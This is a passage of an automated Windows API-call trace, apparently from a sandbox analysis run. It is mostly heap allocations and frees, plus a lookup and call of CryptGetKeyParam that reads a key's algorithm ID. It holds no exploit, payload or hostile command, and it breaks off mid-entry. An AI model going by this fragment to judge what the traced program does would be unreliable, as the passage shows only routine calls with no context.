(HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2630 [0121.926] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca718 [0121.926] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf888 [0121.926] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca730 [0121.926] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26e0 [0121.926] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca760 [0121.926] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8de0 [0121.926] PeekMessageW (in: lpMsg=0x144edac, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144edac) returned 0 [0121.926] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26f0 [0121.926] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26f0 | out: hHeap=0x1780000) returned 1 [0121.926] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26f0 [0121.926] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26f0 | out: hHeap=0x1780000) returned 1 [0121.926] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac780 [0121.926] PeekMessageW (in: lpMsg=0x144edac, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144edac) returned 0 [0121.927] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf8b0 [0121.927] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca988 [0121.927] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26f0 [0121.927] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca988 | out: hHeap=0x1780000) returned 1 [0121.927] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf950 [0121.927] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7f0 [0121.927] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7a8 [0121.927] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2700 [0121.927] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7a8 | out: hHeap=0x1780000) returned 1 [0121.927] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2540 [0121.927] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a9260 [0121.927] CharUpperBuffW (in: lpsz="__CRYPT_GETCALGFROMCRYPTKEY", cchLength=0x1b | out: lpsz="__CRYPT_GETCALGFROMCRYPTKEY") returned 0x1b [0121.927] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a9260 | out: hHeap=0x1780000) returned 1 [0121.927] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2540 | out: hHeap=0x1780000) returned 1 [0121.927] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf978 [0121.927] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2720 [0121.927] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfae0 [0121.927] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8e0 [0121.927] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2540 [0121.927] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2540 | out: hHeap=0x1780000) returned 1 [0121.927] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca928 [0121.927] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb08 [0121.927] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca868 [0121.927] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2540 [0121.927] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca868 | out: hHeap=0x1780000) returned 1 [0121.927] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb30 [0121.927] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca970 [0121.927] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8ac8 [0121.927] PeekMessageW (in: lpMsg=0x144e894, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e894) returned 0 [0121.928] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0148 [0121.928] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca940 [0121.928] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2580 [0121.928] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca880 [0121.928] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca988 [0121.928] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27f0 [0121.928] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca988 | out: hHeap=0x1780000) returned 1 [0121.928] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0008 [0121.928] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8b0 [0121.928] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2850 [0121.928] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa60 [0121.928] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2850 | out: hHeap=0x1780000) returned 1 [0121.928] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1796de8 [0121.928] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27d0 [0121.928] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa30 [0121.928] CharLowerBuffW (in: lpsz="uint", cchLength=0x4 | out: lpsz="uint") returned 0x4 [0121.928] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e2788 [0121.928] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca958 [0121.928] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2740 [0121.928] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca988 [0121.928] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2920 [0121.928] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca910 [0121.928] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27b0 [0121.928] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9a0 [0121.928] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27c0 [0121.928] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9a0 | out: hHeap=0x1780000) returned 1 [0121.928] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27c0 | out: hHeap=0x1780000) returned 1 [0121.928] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca910 | out: hHeap=0x1780000) returned 1 [0121.928] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27b0 | out: hHeap=0x1780000) returned 1 [0121.929] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca988 | out: hHeap=0x1780000) returned 1 [0121.929] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2920 | out: hHeap=0x1780000) returned 1 [0121.929] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2830 [0121.929] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2820 [0121.929] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa30 | out: hHeap=0x1780000) returned 1 [0121.929] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27d0 | out: hHeap=0x1780000) returned 1 [0121.929] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa60 | out: hHeap=0x1780000) returned 1 [0121.929] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8b0 | out: hHeap=0x1780000) returned 1 [0121.929] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0008 | out: hHeap=0x1780000) returned 1 [0121.929] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27f0 | out: hHeap=0x1780000) returned 1 [0121.929] PeekMessageW (in: lpMsg=0x144e894, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e894) returned 0 [0121.929] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cff68 [0121.929] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca808 [0121.929] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2870 [0121.929] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca988 [0121.929] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8f8 [0121.929] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27d0 [0121.929] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8f8 | out: hHeap=0x1780000) returned 1 [0121.929] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0210 [0121.929] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7d8 [0121.929] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2780 [0121.929] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28a0 [0121.929] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4392490 [0121.929] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0121.929] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4392490 | out: hHeap=0x1780000) returned 1 [0121.929] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28a0 | out: hHeap=0x1780000) returned 1 [0121.929] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca820 [0121.929] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8b58 [0121.930] PeekMessageW (in: lpMsg=0x144e244, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e244) returned 0 [0121.930] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28a0 [0121.930] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2750 [0121.930] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2750 | out: hHeap=0x1780000) returned 1 [0121.930] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28a0 | out: hHeap=0x1780000) returned 1 [0121.930] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8b58 | out: hHeap=0x1780000) returned 1 [0121.930] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca820 | out: hHeap=0x1780000) returned 1 [0121.930] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2780 | out: hHeap=0x1780000) returned 1 [0121.930] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca850 [0121.930] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28e0 [0121.930] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9d0 [0121.930] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28e0 | out: hHeap=0x1780000) returned 1 [0121.930] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa48 [0121.930] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28f0 [0121.930] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa30 [0121.930] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28f0 | out: hHeap=0x1780000) returned 1 [0121.930] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca820 [0121.930] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2770 [0121.930] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca910 [0121.930] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2770 | out: hHeap=0x1780000) returned 1 [0121.930] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8b0 [0121.930] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27c0 [0121.930] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27c0 | out: hHeap=0x1780000) returned 1 [0121.930] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9e8 [0121.930] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2760 [0121.930] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7a8 [0121.930] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2760 | out: hHeap=0x1780000) returned 1 [0121.931] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7c0 [0121.931] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2890 [0121.931] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2890 | out: hHeap=0x1780000) returned 1 [0121.931] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca838 [0121.931] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28c0 [0121.931] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca868 [0121.931] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28c0 | out: hHeap=0x1780000) returned 1 [0121.931] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8c78 [0121.931] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0210 | out: hHeap=0x1780000) returned 1 [0121.931] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa00 [0121.931] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27e0 [0121.931] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1796fc8 [0121.931] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e2848 [0121.931] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8c8 [0121.931] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2910 [0121.931] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27e0 | out: hHeap=0x1780000) returned 1 [0121.931] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca898 [0121.931] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28b0 [0121.931] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8f8 [0121.931] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28b0 | out: hHeap=0x1780000) returned 1 [0121.931] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9a0 [0121.931] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2750 [0121.931] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d00d0 [0121.931] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9b8 [0121.931] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2840 [0121.931] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1796ea8 [0121.931] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e2b18 [0121.931] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa18 [0121.932] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2840 | out: hHeap=0x1780000) returned 1 [0121.932] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa18 | out: hHeap=0x1780000) returned 1 [0121.932] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28a0 | out: hHeap=0x1780000) returned 1 [0121.932] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e2b18 | out: hHeap=0x1780000) returned 1 [0121.932] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796ea8 | out: hHeap=0x1780000) returned 1 [0121.932] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9b8 | out: hHeap=0x1780000) returned 1 [0121.932] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d00d0 | out: hHeap=0x1780000) returned 1 [0121.932] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2750 | out: hHeap=0x1780000) returned 1 [0121.932] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27a0 | out: hHeap=0x1780000) returned 1 [0121.932] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2750 | out: hHeap=0x1780000) returned 1 [0121.932] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0121.932] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca790 | out: hHeap=0x1780000) returned 1 [0121.932] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28a0 | out: hHeap=0x1780000) returned 1 [0121.932] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caaa8 | out: hHeap=0x1780000) returned 1 [0121.932] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2840 | out: hHeap=0x1780000) returned 1 [0121.932] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab68 | out: hHeap=0x1780000) returned 1 [0121.932] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2860 | out: hHeap=0x1780000) returned 1 [0121.932] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cacd0 | out: hHeap=0x1780000) returned 1 [0121.932] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28d0 | out: hHeap=0x1780000) returned 1 [0121.932] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab98 | out: hHeap=0x1780000) returned 1 [0121.932] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27e0 | out: hHeap=0x1780000) returned 1 [0121.932] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabb0 | out: hHeap=0x1780000) returned 1 [0121.932] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2750 | out: hHeap=0x1780000) returned 1 [0121.932] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab50 | out: hHeap=0x1780000) returned 1 [0121.932] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2860 | out: hHeap=0x1780000) returned 1 [0121.933] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab68 | out: hHeap=0x1780000) returned 1 [0121.933] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27e0 | out: hHeap=0x1780000) returned 1 [0121.933] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabf8 | out: hHeap=0x1780000) returned 1 [0121.933] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2890 | out: hHeap=0x1780000) returned 1 [0121.933] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac10 | out: hHeap=0x1780000) returned 1 [0121.933] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2920 | out: hHeap=0x1780000) returned 1 [0121.933] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabb0 | out: hHeap=0x1780000) returned 1 [0121.933] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2780 | out: hHeap=0x1780000) returned 1 [0121.933] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab08 | out: hHeap=0x1780000) returned 1 [0121.933] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2770 | out: hHeap=0x1780000) returned 1 [0121.933] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptGetKeyParam", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0121.933] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptGetKeyParam", cchWideChar=17, lpMultiByteStr=0x1796e88, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptGetKeyParam", lpUsedDefaultChar=0x0) returned 17 [0121.933] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad00 | out: hHeap=0x1780000) returned 1 [0121.933] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796e88 | out: hHeap=0x1780000) returned 1 [0121.933] GetProcAddress (hModule=0x756e0000, lpProcName="CryptGetKeyParam") returned 0x75712db0 [0121.933] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cffe0 | out: hHeap=0x1780000) returned 1 [0121.933] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2920 | out: hHeap=0x1780000) returned 1 [0121.933] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2750 | out: hHeap=0x1780000) returned 1 [0121.933] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27e0 | out: hHeap=0x1780000) returned 1 [0121.933] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28a0 | out: hHeap=0x1780000) returned 1 [0121.933] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2800 | out: hHeap=0x1780000) returned 1 [0121.933] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27f0 | out: hHeap=0x1780000) returned 1 [0121.933] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cff90 | out: hHeap=0x1780000) returned 1 [0121.933] CryptGetKeyParam (in: hKey=0x41ac740, dwParam=0x7, pbData=0x43e2820, pdwDataLen=0x144e260, dwFlags=0x0 | out: pbData=0x43e2820*=0x6610, pdwDataLen=0x144e260*=0x4) returned 1 [0121.933] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac88 | out: hHeap=0x1780000) returned 1 [0121.934] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27a0 | out: hHeap=0x1780000) returned 1 [0121.934] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab08 | out: hHeap=0x1780000) returned 1 [0121.934] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab80 | out: hHeap=0x1780000) returned 1 [0121.934] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27e0 | out: hHeap=0x1780000) returned 1 [0121.934] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab20 | out: hHeap=0x1780000) returned 1 [0121.934] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caaa8 | out: hHeap=0x1780000) returned 1 [0121.934] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2920 | out: hHeap=0x1780000) returned 1 [0121.934] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac40 | out: hHeap=0x1780000) returned 1 [0121.934] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad48 | out: hHeap=0x1780000) returned 1 [0121.934] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2860 | out: hHeap=0x1780000) returned 1 [0121.934] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad18 | out: hHeap=0x1780000) returned 1 [0121.934] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab80 | out: hHeap=0x1780000) returned 1 [0121.934] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27c0 | out: hHeap=0x1780000) returned 1 [0121.934] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac58 | out: hHeap=0x1780000) returned 1 [0121.934] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabe0 | out: hHeap=0x1780000) returned 1 [0121.934] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2920 | out: hHeap=0x1780000) returned 1 [0121.934] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad78 | out: hHeap=0x1780000) returned 1 [0121.934] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28c0 | out: hHeap=0x1780000) returned 1 [0121.934] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2790 | out: hHeap=0x1780000) returned 1 [0121.934] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2880 | out: hHeap=0x1780000) returned 1 [0121.934] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28b0 | out: hHeap=0x1780000) returned 1 [0121.934] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2840 | out: hHeap=0x1780000) returned 1 [0121.934] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfef0 | out: hHeap=0x1780000) returned 1 [0121.934] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa78 | out: hHeap=0x1780000) returned 1 [0121.934] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2850 | out: hHeap=0x1780000) returned 1 [0121.934] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7d8 | out: hHeap=0x1780000) returned 1 [0121.934] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9d0 | out: hHeap=0x1780000) returned 1 [0121.934] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca850 | out: hHeap=0x1780000) returned 1 [0121.934] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa30 | out: hHeap=0x1780000) returned 1 [0121.934] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa48 | out: hHeap=0x1780000) returned 1 [0121.934] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca910 | out: hHeap=0x1780000) returned 1 [0121.935] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca820 | out: hHeap=0x1780000) returned 1 [0121.935] HeapFree (in: hHeap=0x1780000, 